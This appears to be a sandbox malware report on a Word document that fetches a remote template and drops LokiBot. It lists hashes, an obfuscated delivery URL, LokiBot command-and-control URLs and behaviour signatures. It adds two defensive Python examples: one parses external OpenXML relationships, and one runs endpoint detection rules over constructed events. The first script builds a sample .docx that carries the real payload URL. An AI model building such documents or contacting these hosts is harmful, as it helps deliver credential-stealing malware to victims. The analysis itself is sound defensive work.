General
Target: Scan_Copy264293.docx.doc
Size: 10KB
Sample: 230217-aqp1nscd6w
MD5: d7976a1b0ba9ef31b265e27f03cfc3b8
SHA1: 1d0671fd17080358afc60b501d0d13b222628ac7
SHA256: 39999753f89f21851b943b83359b3738e180129a239cc4e424ebb077ec738d2f
SHA512: 1b6dd881fa1b0e68ff1715636182e9db0cb1a827dd8ca7cc029c863485c23d72938d838f67334dd8b3445f919371ed91b9b888e5702136087aa48c1188acb5c9
SSDEEP: 192:ScIMmtP5hG/b7XN+eOneQjO+5+5F7Jar/YEChI3Lt:SPXRE7XtOP7wtar/YECO5
Static task: static1
Behavioral task: behavioral1 (sample Scan_Copy264293.docx, resource win7-20221111-en)
Behavioral task: behavioral2 (sample Scan_Copy264293.docx, resource win10v2004-20221111-en)
Malware Config
Extracted (external file URL embedded in the OpenXML package):
http:/QQQQWWWWQWWWWQWWQWQWQWQQWQWQQWQWQWQWQWQWQWQQQQQQQQOQQQQQOOOOOOOOQOQQQQOQOQOQOQOQOQQWWWWQWQWQWQWQWQWQWQWQQWQ@1332625038/O.DOC
Note the single slash after the scheme and the long run of Q/W/O characters: everything before the "@" is URL userinfo, so the real host is the bare integer 1332625038, which is 79.110.62.142 in dotted form, and the file requested is /O.DOC. Indicator matching on the literal string will miss the same host written as 79.110.62.142 or in hex, so normalise the host before comparing.
Extracted (lokibot C2):
http://171.22.30.164/yan/five/fre.php
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
The four kbfvzoboss.bid and alphastand.* entries are the hardcoded fallback URLs present in LokiBot builds generally; the operator-specific panel for this sample is http://171.22.30.164/yan/five/fre.php, so that is the indicator worth pivoting on.
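The check an analyst wants for the "Abuses OpenXML format to download file from external location" finding is to pull every external relationship out of the .docx package directly and normalise the target, rather than trusting the literal string. The script below is an added example, not part of the sandbox report or its tooling: it builds a minimal, constructed .docx in memory whose word/_rels/settings.xml.rels carries the URL from the Malware Config block (the attachedTemplate relationship type is this example's assumption about how the URL is carried; the report does not say), then walks every .rels part, lists the external targets, and decodes a host written as a decimal or hex integer. The tolerant URL splitter is the example's own, written so that the "http:/" single-slash form parses.

```python
"""Extract external (TargetMode="External") relationships from an OpenXML
package and normalise obfuscated hosts.

Added example: the package layout and relationship type are constructed;
only the URL comes from the sandbox report.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")

# URL from the report's Malware Config block. Everything before '@' is userinfo.
TEMPLATE_URL = ("http:/QQQQWWWWQWWWWQWWQWQWQWQQWQWQQWQWQWQWQWQWQWQQQQQQQQOQQQQQ"
                "OOOOOOOOQOQQQQOQOQOQOQOQOQQWWWWQWQWQWQWQWQWQWQWQQWQ@1332625038/O.DOC")


def split_authority(url):
    """Split a possibly malformed URL into (scheme, userinfo, host, path).

    Tolerates any number of slashes after the scheme (the sample uses one).
    IPv6 bracket hosts are not handled; this is a triage helper, not a parser.
    """
    m = re.match(r"^([a-zA-Z][a-zA-Z0-9+.-]*):/*([^/]*)(.*)$", url)
    if not m:
        return None
    scheme, authority, path = m.groups()
    userinfo, sep, hostport = authority.rpartition("@")
    if not sep:
        userinfo, hostport = "", authority
    host = hostport.rsplit(":", 1)[0] if ":" in hostport else hostport
    return scheme.lower(), userinfo, host, path or "/"


def decode_host(host):
    """Turn a host written as a bare 32-bit integer (decimal or 0x hex) into
    dotted-quad form; browsers and most HTTP clients accept both spellings.
    Anything else is returned unchanged."""
    try:
        n = int(host, 16) if host.lower().startswith("0x") else int(host, 10)
    except ValueError:
        return host
    if not 0 <= n <= 0xFFFFFFFF:
        return host
    return ".".join(str((n >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def build_sample_docx(template_url):
    """Constructed minimal .docx: just enough parts to carry a remote template."""
    settings_rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{REL_NS}">'
        f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
        f'Target="{template_url}" TargetMode="External"/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/settings.xml", "<w:settings/>")
        z.writestr("word/_rels/settings.xml.rels", settings_rels)
    return buf.getvalue()


def external_relationships(docx_bytes):
    """Return (part, short relationship type, target) for every external rel
    in every .rels part of the package."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal") == "External":
                    rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                    found.append((name, rel_type, rel.get("Target", "")))
    return found


def analyse(docx_bytes):
    """Return one IOC dict per external relationship, host normalised."""
    iocs = []
    for part, rel_type, target in external_relationships(docx_bytes):
        parsed = split_authority(target)
        if parsed is None:
            continue
        scheme, userinfo, host, path = parsed
        iocs.append({"part": part, "type": rel_type, "raw": target,
                     "scheme": scheme, "host": decode_host(host),
                     "path": path, "userinfo_len": len(userinfo)})
    return iocs


if __name__ == "__main__":
    for ioc in analyse(build_sample_docx(TEMPLATE_URL)):
        print(ioc)
```

Run against a real sample, replace build_sample_docx() with the file's bytes; the same loop also surfaces external oleObject, hyperlink and image relationships, which is why it iterates every .rels part rather than only settings.xml.rels.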
Targets
Target: Scan_Copy264293.docx.doc (10KB; hashes as listed under General)
Score: 10/10
- Blocklisted process makes network request
- Downloads MZ/PE file
- Abuses OpenXML format to download file from external location
- Executes dropped EXE
- Loads dropped DLL
- Uses the VBS compiler for execution
- Accesses Microsoft Outlook profiles
- Suspicious use of SetThreadContext
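The signatures above describe a chain (Office process makes an outbound request and pulls down a PE, the dropped EXE runs, vbc.exe is started and used as the execution host, with SetThreadContext pointing at injection into it, and the payload then talks to the LokiBot panel) that can be turned into endpoint rules. The script below is an added example, not part of the sandbox report: it runs a handful of rules over constructed event records shaped like Sysmon process-creation (id 1) and network-connection (id 3) events plus a proxy line, and uses the C2 list from the Malware Config block. The rule names, the allow-lists, the user name, the dropped-file name and the dotted IP for the template host (79.110.62.142, the decimal 1332625038 from the extracted URL written out) are this example's own choices.

```python
"""Triage rules for the behaviour chain in the sandbox signatures, run over
constructed process, network and proxy events.

Added example; events are made up, the C2 list is from the report.
"""
import ipaddress
from urllib.parse import urlsplit

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Parents for which a vbc.exe child is expected; anything else is suspect.
DEV_TOOL_PARENTS = {"msbuild.exe", "devenv.exe"}
# Directories a dropped PE is typically executed from (constructed list).
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")
# LokiBot C2 URLs from the report. The last four are the defaults shipped in
# LokiBot builds generally, so a hit on them says "LokiBot", not which operator.
LOKIBOT_C2 = {
    "http://171.22.30.164/yan/five/fre.php",
    "http://kbfvzoboss.bid/alien/fre.php",
    "http://alphastand.trade/alien/fre.php",
    "http://alphastand.win/alien/fre.php",
    "http://alphastand.top/alien/fre.php",
}
C2_HOSTS = {urlsplit(u).hostname for u in LOKIBOT_C2}

# Constructed events. Paths, user name and drop.exe are invented; the template
# host is the report's decimal 1332625038 in dotted form.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "parent_image": r"C:\Windows\explorer.exe"},
    {"id": 3, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "dest_ip": "79.110.62.142"},
    {"id": 1, "image": r"C:\Users\victim\AppData\Local\Temp\drop.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"id": 1, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe",
     "parent_image": r"C:\Users\victim\AppData\Local\Temp\drop.exe"},
    {"id": "proxy", "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe",
     "url": "http://171.22.30.164/yan/five/fre.php", "method": "POST"},
    {"id": 1, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe",
     "parent_image": r"C:\Program Files\Microsoft Visual Studio\2022\MSBuild\Current\Bin\MSBuild.exe"},
]


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_process(ev):
    """Rules over one process-creation event; returns the matched rule names."""
    hits = []
    image, parent = basename(ev["image"]), basename(ev["parent_image"])
    if parent in OFFICE_APPS and image not in OFFICE_APPS:
        hits.append("office_app_spawned_child")        # Executes dropped EXE
    if ev["image"].lower().startswith(USER_WRITABLE):
        hits.append("exe_from_user_writable_path")     # dropped payload location
    if image == "vbc.exe" and parent not in DEV_TOOL_PARENTS:
        hits.append("vbc_outside_build_toolchain")     # Uses the VBS compiler for execution
    return hits


def check_network(ev):
    """Office application connecting to a public address (blocklisted process
    makes network request)."""
    if (basename(ev["image"]) in OFFICE_APPS
            and ipaddress.ip_address(ev["dest_ip"]).is_global):
        return ["office_app_external_connection"]
    return []


def check_proxy(ev):
    """Exact C2 match first; otherwise the shared /fre.php panel path on a POST."""
    url = ev["url"]
    if url in LOKIBOT_C2 or urlsplit(url).hostname in C2_HOSTS:
        return ["lokibot_c2_url"]
    if url.endswith("/fre.php") and ev.get("method") == "POST":
        return ["lokibot_like_panel_path"]
    return []


def triage(events):
    """Return {rule name: [indices of matching events]}."""
    handlers = {1: check_process, 3: check_network, "proxy": check_proxy}
    matches = {}
    for i, ev in enumerate(events):
        for rule in handlers.get(ev["id"], lambda e: [])(ev):
            matches.setdefault(rule, []).append(i)
    return matches


if __name__ == "__main__":
    for rule, idx in triage(SAMPLE_EVENTS).items():
        print(f"{rule}: events {idx}")
```

The vbc.exe rule keys on the parent rather than on vbc.exe itself, because the binary is legitimate and present on every machine with the .NET Framework; the last sample event (vbc.exe under MSBuild) shows the allow-listed case producing no hit, which is the false positive a naive "vbc.exe executed" rule would raise on every build server.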